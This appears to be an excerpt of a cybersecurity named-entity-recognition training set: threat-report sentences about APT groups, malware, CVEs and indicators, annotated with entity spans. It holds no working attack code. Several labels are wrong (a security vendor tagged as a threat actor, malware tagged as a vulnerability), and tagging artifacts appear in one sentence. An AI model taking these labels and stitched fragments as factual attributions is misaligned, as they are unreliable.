[[425, 432]]}, "info": {"id": "cyberner_stix_train_003778", "source": "cyberner_stix_train"}} {"text": "One of the most significant features TrickMo possesses is the app recording feature , which is what gives TrickBot the ability to overcome the newer pushTAN app validations deployed by banks . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . 
these attacks were part of a planned operation against specific targets in India .", "spans": {"MALWARE: TrickMo": [[37, 44]], "MALWARE: TrickBot": [[106, 114]], "THREAT_ACTOR: APT38": [[255, 260]], "ORGANIZATION: financial institutions": [[296, 318]]}, "info": {"id": "cyberner_stix_train_003779", "source": "cyberner_stix_train"}} {"text": "Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors . Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": {"TOOL: Hermes": [[0, 6]]}, "info": {"id": "cyberner_stix_train_003780", "source": "cyberner_stix_train"}} {"text": "By going on the offensive and hunting the attackers , our team was able to unearth the early stages of what may be a very dangerous mobile malware . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": {"ORGANIZATION: WildFire": [[172, 180]], "MALWARE: Word document": [[218, 231], [289, 302]], "MALWARE: hello.docx": [[236, 246]], "TOOL: PDF": [[394, 397]], "VULNERABILITY: exploits": [[398, 406], [428, 436], [473, 481]], "TOOL: Adobe Flash Player": [[409, 427]], "VULNERABILITY: CVE-2012-0158": [[454, 467]], "TOOL: Word": [[468, 472]], "MALWARE: Tran Duy Linh": [[528, 541]]}, "info": {"id": "cyberner_stix_train_003781", "source": "cyberner_stix_train"}} {"text": "The first timer will be fired on the configured interval ( 20 seconds in this case ) , pinging the command and control ( C2 ) server . 
In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[235, 250]], "THREAT_ACTOR: APT37": [[317, 322]], "MALWARE: KARAE": [[342, 347]], "MALWARE: malware": [[348, 355]]}, "info": {"id": "cyberner_stix_train_003782", "source": "cyberner_stix_train"}} {"text": "This is significant because it suggests that OnionDuke was under development before any part of the Duke operation became public .", "spans": {"MALWARE: OnionDuke": [[45, 54]], "THREAT_ACTOR: Duke": [[100, 104]]}, "info": {"id": "cyberner_stix_train_003783", "source": "cyberner_stix_train"}} {"text": "APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "TOOL: custom backdoor": [[35, 50]], "ORGANIZATION: government": [[183, 193]]}, "info": {"id": "cyberner_stix_train_003784", "source": "cyberner_stix_train"}} {"text": "Users can not rely on the official app stores for their safety , and should implement advanced security protections capable of detecting and blocking zero-day mobile malware . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . Then the connection is retried . 
Figure 2 : Historical Russia - nexus activity impacting OT", "spans": {"ORGANIZATION: Dragos WorldView": [[318, 334]], "THREAT_ACTOR: Russia - nexus activity": [[392, 415]], "SYSTEM: OT": [[426, 428]]}, "info": {"id": "cyberner_stix_train_003785", "source": "cyberner_stix_train"}} {"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON , with subsequent public presentations at Cyberwarcon and the Kaspersky Lab sponsored Security Analyst Summit essentially linking TRITON and the research institute ( and therefore TEMP.Veles ) as one in the same .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[38, 48], [127, 137]], "ORGANIZATION: FireEye": [[51, 58]], "MALWARE: TRITON": [[160, 166], [297, 303]], "ORGANIZATION: Cyberwarcon": [[209, 220]], "ORGANIZATION: Kaspersky Lab": [[229, 242]], "ORGANIZATION: Security Analyst Summit": [[253, 276]], "MALWARE: TEMP.Veles": [[347, 357]]}, "info": {"id": "cyberner_stix_train_003786", "source": "cyberner_stix_train"}} {"text": "The SMS message will be instantly sent to the server , informing the malware operator of executed tasks . The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . 
For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": {"TOOL: PLATINUM tool": [[110, 123]], "TOOL: malware": [[158, 165]], "THREAT_ACTOR: Sowbug": [[257, 263]], "MALWARE: Felismus backdoor": [[316, 333]], "FILEPATH: adobecms.exe": [[393, 405]], "FILEPATH: CSIDL_WINDOWS\\debug": [[409, 428]]}, "info": {"id": "cyberner_stix_train_003787", "source": "cyberner_stix_train"}} {"text": "On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf . TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": {"ORGANIZATION: Arbor Networks": [[13, 27]], "TOOL: Trojan": [[94, 100]], "TOOL: RAT": [[103, 106]], "TOOL: Ismdoor": [[116, 123]], "THREAT_ACTOR: TG-3390": [[196, 203]], "TOOL: DLL": [[337, 340]]}, "info": {"id": "cyberner_stix_train_003788", "source": "cyberner_stix_train"}} {"text": "Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts . In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . As shown in Figure 1, the emails originated from the Yahoo ! email address mts03282000@yahoo.co.jp , and contained the subject “ Sending of New Year . 
While the use of web shells is common amongst threat actors , the parent processes , timing , and victim(s ) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Google": [[90, 96]], "ORGANIZATION: banks": [[172, 177]], "ORGANIZATION: law firm": [[182, 190]], "ORGANIZATION: bank": [[197, 201]], "TOOL: emails": [[255, 261]], "ORGANIZATION: Yahoo": [[282, 287]], "TOOL: email": [[290, 295]], "EMAIL: mts03282000@yahoo.co.jp": [[304, 327]]}, "info": {"id": "cyberner_stix_train_003789", "source": "cyberner_stix_train"}} {"text": "This APT attack was analyzed and attributed upon the detection and 360 Core Security now confirmed its association with the APT-C-06 Group . In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros .", "spans": {"ORGANIZATION: 360 Core Security": [[67, 84]], "THREAT_ACTOR: APT-C-06": [[124, 132]], "THREAT_ACTOR: APT32": [[169, 174]], "FILEPATH: ActiveMime files": [[189, 205]]}, "info": {"id": "cyberner_stix_train_003790", "source": "cyberner_stix_train"}} {"text": "The following are the three files:Defender.sct – The malicious JavaScript based scriptlet file . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"MALWARE: files:Defender.sct": [[28, 46]], "MALWARE: scriptlet": [[80, 89]], "MALWARE: file": [[90, 94]], "MALWARE: PIVY": [[97, 101], [363, 367]], "ORGANIZATION: chemical makers": [[175, 190]], "ORGANIZATION: government agencies": [[193, 212]], "ORGANIZATION: defense contractors": [[215, 234]], "THREAT_ACTOR: attackers": [[305, 314]], "VULNERABILITY: zero-day": [[322, 330]]}, "info": {"id": "cyberner_stix_train_003791", "source": "cyberner_stix_train"}} {"text": "The techniques , tools , and procedures used in this campaign bear great resemblance to previous attacks attributed to the MoleRATs Group ( aka Gaza Cybergang Group ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": {"THREAT_ACTOR: MoleRATs": [[123, 131]], "THREAT_ACTOR: Gaza Cybergang": [[144, 158]]}, "info": {"id": "cyberner_stix_train_003792", "source": "cyberner_stix_train"}} {"text": "This third campaign is consistent with two previously reported attack campaigns in terms of targeting : the targets were government organizations dealing with foreign affairs .", "spans": {}, "info": {"id": "cyberner_stix_train_003793", "source": "cyberner_stix_train"}} {"text": "Hacking Team has been known to use both CVE-2014-3153 and CVE-2013-6282 in their attacks . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . This is further detailed below . 
In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": {"VULNERABILITY: CVE-2014-3153": [[40, 53]], "VULNERABILITY: CVE-2013-6282": [[58, 71]], "VULNERABILITY: Carbanak": [[91, 99]], "ORGANIZATION: consumer": [[167, 175]], "TOOL: Carberp": [[267, 274]], "THREAT_ACTOR: Winnti group": [[324, 336]], "ORGANIZATION: gaming companies": [[358, 374]], "MALWARE: self - named data- and file - stealing malware": [[398, 444]]}, "info": {"id": "cyberner_stix_train_003794", "source": "cyberner_stix_train"}} {"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": {"ORGANIZATION: government sector": [[37, 54]], "THREAT_ACTOR: Poseidon Group": [[99, 113]], "ORGANIZATION: executives": [[283, 293]]}, "info": {"id": "cyberner_stix_train_003795", "source": "cyberner_stix_train"}} {"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . 
POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"MALWARE: INI file": [[4, 12]], "TOOL: PowerShell": [[100, 110]], "MALWARE: VBS file": [[151, 159]], "MALWARE: WScript.exe": [[179, 190]], "MALWARE: POWRUNER": [[193, 201]], "FILEPATH: RTF file": [[234, 242]], "VULNERABILITY: CVE-2017-0199": [[258, 271]]}, "info": {"id": "cyberner_stix_train_003796", "source": "cyberner_stix_train"}} {"text": "This feature added automatic error checking to critical parts of the program ’s execution at the cost , from a malware perspective , of providing additional hints that make the malware ’s functionality easier for reverse engineers to understand .", "spans": {}, "info": {"id": "cyberner_stix_train_003797", "source": "cyberner_stix_train"}} {"text": "Similar to previous malware which infiltrated Google Play , such as FalseGuide and Skinner , Judy relies on the communication with its Command and Control server ( C & C ) for its operation . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses . The data is decrypted , the remote host list is parsed and verified using the BuildTargetIpListStruct function . So , when LockBit , the most active ransomware group in the world , is hitting three times as many victims as the next most active gang , you need to know how to prepare .", "spans": {"SYSTEM: Google Play": [[46, 57]], "MALWARE: FalseGuide": [[68, 78]], "MALWARE: Skinner": [[83, 90]], "ORGANIZATION: gaming studios": [[251, 265]], "ORGANIZATION: high tech businesses": [[270, 290]], "THREAT_ACTOR: LockBit": [[416, 423]], "THREAT_ACTOR: ransomware group": [[442, 458]]}, "info": {"id": "cyberner_stix_train_003798", "source": "cyberner_stix_train"}} {"text": "Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . 
Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"SYSTEM: Cisco Cloud Web Security ( CWS )": [[0, 32]], "SYSTEM: Web Security Appliance ( WSA )": [[36, 66]], "MALWARE: Previous versions": [[162, 179]], "ORGANIZATION: Kaspersky": [[198, 207]], "THREAT_ACTOR: Cylance": [[220, 227]], "EMAIL: watsonhenny@gmail.com": [[276, 297]], "ORGANIZATION: employees": [[339, 348]], "THREAT_ACTOR: APT38": [[377, 382]]}, "info": {"id": "cyberner_stix_train_003799", "source": "cyberner_stix_train"}} {"text": "Indicators of Compromise ( IoCs ) hxxp : //mcsoft365.com/c hxxp : //pingconnect.net/c Hashes MD5 : 5c749c9fce8c41bf6bcc9bd8a691621b SHA256 : 284bd2d16092b4d13b6bc85d87950eb4c5e8cbba9af2a04d76d88da2f26c485c MD5 : b264af5d2f3390e465052ab502b0726d Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": {"THREAT_ACTOR: APT38": [[288, 293]], "ORGANIZATION: financial institutions": [[326, 348]], "ORGANIZATION: Symantec": [[470, 478]]}, "info": {"id": "cyberner_stix_train_003800", "source": "cyberner_stix_train"}} {"text": "The information is then stored in local app database as well as sent to the backend . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application . U.S . 
cybersecurity firm FireEye also recently captured BlackOasis activity as part of a similar incident where the group relied on a different zero-day exploit — more specifically , a SOAP WSDL I-TOOL parser I-VULNAME E-TOOL code injection vulnerability — to install FinSpy onto a small number of devices . Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": {"TOOL: Smart Installer Maker": [[146, 167]], "TOOL: self-extracting RAR": [[197, 216]], "TOOL: decoy slideshow": [[245, 260]], "TOOL: Flash installation application": [[264, 294]], "ORGANIZATION: FireEye": [[322, 329]], "THREAT_ACTOR: BlackOasis": [[353, 363]], "VULNERABILITY: zero-day": [[441, 449]], "TOOL: SOAP": [[482, 486]], "VULNERABILITY: WSDL I-TOOL parser I-VULNAME E-TOOL code injection": [[487, 537]], "MALWARE: FinSpy": [[565, 571]], "THREAT_ACTOR: FIN7": [[741, 745]]}, "info": {"id": "cyberner_stix_train_003801", "source": "cyberner_stix_train"}} {"text": "But that does n't mean companies and organizations are out of the woods . This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan . OceanLotus : 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 Loader #1 . 
None PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user - supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": {"ORGANIZATION: PwC UK": [[127, 133]], "ORGANIZATION: BAE Systems": [[138, 149]], "THREAT_ACTOR: threat actor": [[221, 233]], "ORGANIZATION: managed IT service providers": [[242, 270]], "THREAT_ACTOR: OceanLotus": [[351, 361]], "FILEPATH: 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999": [[364, 428]], "TOOL: PIEHOP": [[446, 452]]}, "info": {"id": "cyberner_stix_train_003802", "source": "cyberner_stix_train"}} {"text": "Update as of July 23 , 2015 1:00 AM PDT ( UTC-7 ) We have added a link to a previous report discussing this threat . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . If the code can’t determine the mapping in later maturity levels , It is thought they were likely targeted because they might have information on foreign policy of countries towards Iran , negotiations over Irans nuclear program , or information about Iranian dissidents .", "spans": {"THREAT_ACTOR: crime gang": [[135, 145]], "VULNERABILITY: Carbanak": [[157, 165]], "ORGANIZATION: financial institutions": [[214, 236]], "ORGANIZATION: Iran": [[542, 546]], "ORGANIZATION: Irans": [[567, 572]], "ORGANIZATION: Iranian dissidents .": [[612, 632]]}, "info": {"id": "cyberner_stix_train_003803", "source": "cyberner_stix_train"}} {"text": "] 102 2020-03-29 http : //ora.blindsidefantasy [ . The PowerShell version of the Trojan also has the ability to get screenshots . 
There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) .", "spans": {"MALWARE: PowerShell": [[55, 65]], "THREAT_ACTOR: menuPass": [[197, 205]], "THREAT_ACTOR: Stone Panda": [[222, 233]], "THREAT_ACTOR: APT10": [[238, 243]]}, "info": {"id": "cyberner_stix_train_003804", "source": "cyberner_stix_train"}} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "MALWARE: Trojan": [[167, 173]], "ORGANIZATION: banks": [[202, 207]]}, "info": {"id": "cyberner_stix_train_003805", "source": "cyberner_stix_train"}} {"text": "The dynamically-loaded code is also flooded with meaningless commands that mask the actual commands passing through . As shown above , the threat runs several native binaries to collect useful information for its recon phase . Most AveMaria targets ( 72% ) were in the EU . We took google - analytics as an example , but other services can also be used .", "spans": {"TOOL: native binaries": [[159, 174]], "MALWARE: AveMaria": [[232, 240]], "ORGANIZATION: EU": [[269, 271]], "SYSTEM: google - analytics": [[282, 300]]}, "info": {"id": "cyberner_stix_train_003806", "source": "cyberner_stix_train"}} {"text": "In October 2014 , FireEye released APT28 : A Window into Russia ’s Cyber Espionage Operations? 
, and characterized APT28 ’s activity as aligning with the Russian Government ’s strategic intelligence requirements .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT28": [[35, 40], [115, 120]], "SYSTEM: Window": [[45, 51]]}, "info": {"id": "cyberner_stix_train_003807", "source": "cyberner_stix_train"}} {"text": "The dropped “ tf394kv.dll ” file is an external C&C communications library , compiled on July 24th , 2015 and used by the main backdoor for all Internet-based communications .", "spans": {"FILEPATH: tf394kv.dll": [[14, 25]], "TOOL: C&C": [[48, 51]]}, "info": {"id": "cyberner_stix_train_003808", "source": "cyberner_stix_train"}} {"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": {"MALWARE: GRIFFON": [[8, 15]], "FILEPATH: decoy files": [[191, 202]]}, "info": {"id": "cyberner_stix_train_003809", "source": "cyberner_stix_train"}} {"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": {"MALWARE: RTF": [[5, 8]], "VULNERABILITY: CVE-2017_1882": [[28, 41]], "MALWARE: eqnedt32.exe": [[45, 57]], "THREAT_ACTOR: APT5": [[76, 80]], "ORGANIZATION: organizations": [[94, 107]], "ORGANIZATION: personnel": [[112, 121]]}, "info": {"id": "cyberner_stix_train_003810", "source": "cyberner_stix_train"}} {"text": "This and following versions were masquerading as fake “ Adobe Flash Player ” apps . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . 
CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013 .", "spans": {"SYSTEM: Adobe Flash Player": [[56, 74]], "TOOL: OSB": [[88, 91]], "THREAT_ACTOR: CIA": [[127, 130]], "THREAT_ACTOR: CopyKittens": [[192, 203]]}, "info": {"id": "cyberner_stix_train_003811", "source": "cyberner_stix_train"}} {"text": "] 26 192 [ . In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities . For newer operating systems, events.exe creates task.xml . We have not observed indications that the group claiming to be REvil that took part in the attack on the EIB was connected to the widely known ransomware group .", "spans": {"THREAT_ACTOR: APT37": [[23, 28]], "ORGANIZATION: chemicals": [[184, 193]], "ORGANIZATION: electronics": [[196, 207]], "ORGANIZATION: manufacturing": [[210, 223]], "ORGANIZATION: aerospace": [[226, 235]], "ORGANIZATION: automotive": [[238, 248]], "ORGANIZATION: healthcare entities": [[253, 272]], "FILEPATH: events.exe": [[304, 314]], "FILEPATH: task.xml": [[323, 331]], "THREAT_ACTOR: REvil": [[397, 402]], "ORGANIZATION: EIB": [[439, 442]]}, "info": {"id": "cyberner_stix_train_003812", "source": "cyberner_stix_train"}} {"text": "Sofacy selectively used SPLM / CHOPSTICK modules as second stage implants to high interest targets for years now .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "MALWARE: SPLM": [[24, 28]], "MALWARE: CHOPSTICK": [[31, 40]]}, "info": {"id": "cyberner_stix_train_003813", "source": "cyberner_stix_train"}} {"text": "Application lifecycle Application Lifecycle Google Bouncer Bypass On start , the application checks if it is executed on one of the Google servers : IP ranges 209.85.128.0-209.85.255.255 , 216.58.192.0-216.58.223.255 , 173.194.0.0-173.194.255.255 , 74.125.0.0-74.125.255.255 or if it is executed on IP 
hosted domain that contains the following strings : “ google ” , ” android ” , ” 1e100 ” . The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . and as discovered later , even the U.S. and UK governments .", "spans": {"SYSTEM: Google Bouncer": [[44, 58]], "SYSTEM: android": [[369, 376]], "THREAT_ACTOR: group": [[397, 402]], "VULNERABILITY: (CVE-2018-0802)": [[455, 470]], "ORGANIZATION: governments": [[574, 585]]}, "info": {"id": "cyberner_stix_train_003814", "source": "cyberner_stix_train"}} {"text": "We believe this activity , which dates back to at least July 2017 , was intended to target travelers to hotels throughout Europe and the Middle East .", "spans": {}, "info": {"id": "cyberner_stix_train_003815", "source": "cyberner_stix_train"}} {"text": "] websiteaccounts-fb [ . In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . On the site “ www.china-one.org , ” the email address “ lfengg@163.com ” appears as the contact for the Shanghai Kai Optical Information Technology Co. , Ltd. , a website production company located in a part of Shanghai that is across the river from PLA Unit 61398 . 
Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": {"TOOL: Infy": [[162, 166]], "DOMAIN: www.china-one.org": [[213, 230]], "TOOL: email": [[239, 244]], "EMAIL: lfengg@163.com": [[255, 269]], "ORGANIZATION: Kai Optical Information Technology": [[312, 346]], "ORGANIZATION: PLA": [[449, 452]], "ORGANIZATION: Unit 61398": [[453, 463]], "THREAT_ACTOR: XSS attacks": [[492, 503]], "SYSTEM: CSP": [[506, 509]]}, "info": {"id": "cyberner_stix_train_003816", "source": "cyberner_stix_train"}} {"text": "Though the encryption and ransom functionality of BitPaymer was not technically sophisticated , the malware contained multiple anti-analysis features that overlapped with Dridex . ScarCruft uses a multi-stage binary infection scheme .", "spans": {"TOOL: BitPaymer": [[50, 59]], "TOOL: Dridex": [[171, 177]], "THREAT_ACTOR: ScarCruft": [[180, 189]]}, "info": {"id": "cyberner_stix_train_003817", "source": "cyberner_stix_train"}} {"text": "As soon as the user picks up the device , the implant will detect a motion event and execute the “ tk1 ” and “ input keyevent 3 ” commands . This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT . APT33 : 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2 Remcos . The Twitter handle used by Hack520 indicates also an “ est ” portion .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[183, 195]], "THREAT_ACTOR: APT33": [[226, 231]], "MALWARE: 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2 Remcos": [[234, 312]], "THREAT_ACTOR: Hack520": [[342, 349]]}, "info": {"id": "cyberner_stix_train_003818", "source": "cyberner_stix_train"}} {"text": "After the server returns the solution , the app enters it into the appropriate text field to complete the CAPTCHA challenge . 
Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update . After discovering the BLACKCOFFEE activity , the FireEye-Microsoft team encoded a sinkhole IP address into the profile pages and forum threads and locked the accounts to prevent the threat actors from making any changes . Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": {"MALWARE: BLACKCOFFEE": [[278, 289]], "ORGANIZATION: FireEye-Microsoft": [[305, 322]], "VULNERABILITY: CVE-2013 - 0640": [[574, 589]]}, "info": {"id": "cyberner_stix_train_003819", "source": "cyberner_stix_train"}} {"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we’ve been tracking as BACKSWING . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": {"ORGANIZATION: FireEye": [[45, 52]], "MALWARE: BADRABBIT": [[89, 98]], "TOOL: BACKSWING": [[166, 175]], "THREAT_ACTOR: activity groups": [[217, 232]], "THREAT_ACTOR: PROMETHIUM": [[235, 245]], "THREAT_ACTOR: NEODYMIUM": [[250, 259]], "VULNERABILITY: zeroday": [[318, 325]], "VULNERABILITY: exploit": [[326, 333]]}, "info": {"id": "cyberner_stix_train_003820", "source": "cyberner_stix_train"}} {"text": "Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest . 
According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"TOOL: Nbtscan": [[0, 7]], "THREAT_ACTOR: APT10": [[25, 30]], "ORGANIZATION: IT": [[103, 105]], "MALWARE: Corkow": [[177, 183]], "ORGANIZATION: users": [[202, 207]]}, "info": {"id": "cyberner_stix_train_003821", "source": "cyberner_stix_train"}} {"text": "Creation date is a week before the start of the tournament . APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL . The Ursnif variants were primarily grouped by C2 infrastructure . Companies conducing a risk analysis would be well served to consider such motivations when evaluating their exposure .", "spans": {"THREAT_ACTOR: APT32": [[61, 66]], "TOOL: WINDSHIELD": [[155, 165]], "TOOL: KOMPROGO": [[168, 176]], "TOOL: SOUNDBITE": [[179, 188]], "TOOL: PHOREAL": [[195, 202]], "MALWARE: Ursnif": [[209, 215]], "TOOL: C2": [[251, 253]]}, "info": {"id": "cyberner_stix_train_003822", "source": "cyberner_stix_train"}} {"text": "With the enhanced post-breach detection capabilities of Windows Defender ATP , SOC personnel are able to reduce this period to hours or even minutes , significantly lessening the potential impact of persistent attacker access to their network .", "spans": {"TOOL: enhanced post-breach detection capabilities": [[9, 52]], "TOOL: Windows Defender ATP": [[56, 76]]}, "info": {"id": "cyberner_stix_train_003823", "source": "cyberner_stix_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . 
targeted attacks .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]]}, "info": {"id": "cyberner_stix_train_003824", "source": "cyberner_stix_train"}} {"text": "Our logs show a number of simultaneous Red Alert 2.0 campaigns in operation , many ( but not all ) hosted on dynamic DNS domains . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts . The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP . The infection starts with a malicious email containing a link that downloads a JS file that used to download DLL .", "spans": {"MALWARE: simultaneous Red Alert 2.0 campaigns": [[26, 62]], "ORGANIZATION: defectors": [[209, 218]], "MALWARE: Remexi": [[371, 377]], "THREAT_ACTOR: a malicious email containing a link that downloads a JS file that used to download DLL": [[432, 518]]}, "info": {"id": "cyberner_stix_train_003825", "source": "cyberner_stix_train"}} {"text": "Lookout has determined ViperRAT is a very sophisticated threat that adds to the mounting evidence that targeted mobile attacks against governments and business is a real problem . Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 . Therefore , separate services can run , depending on how and where Svchost.exe is started . 
The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: ViperRAT": [[23, 31]], "ORGANIZATION: Kaspersky APT Intelligence Reporting subscription": [[180, 229]], "FILEPATH: Svchost.exe": [[351, 362]], "VULNERABILITY: allowing code execution through PowerShell remoting": [[462, 513]]}, "info": {"id": "cyberner_stix_train_003826", "source": "cyberner_stix_train"}} {"text": "In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Their primary interest appears to be gathering intelligence .", "spans": {"THREAT_ACTOR: threat actors": [[21, 34]], "ORGANIZATION: media organizations": [[93, 112]]}, "info": {"id": "cyberner_stix_train_003827", "source": "cyberner_stix_train"}} {"text": "During this process , an amount of money , configured by the malicious operator , is requested to the user . Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": {"THREAT_ACTOR: ITG08": [[118, 123]], "TOOL: WMI": [[178, 181]], "TOOL: PowerShell": [[186, 196]], "ORGANIZATION: Talos": [[305, 310]], "MALWARE: ROKRAT": [[395, 401]]}, "info": {"id": "cyberner_stix_train_003828", "source": "cyberner_stix_train"}} {"text": "Going one step further , we rebuilt the malware to execute the apparent functionality of generating a payload , but discovered that the APK stored in the /res/raw/ directory is empty . 
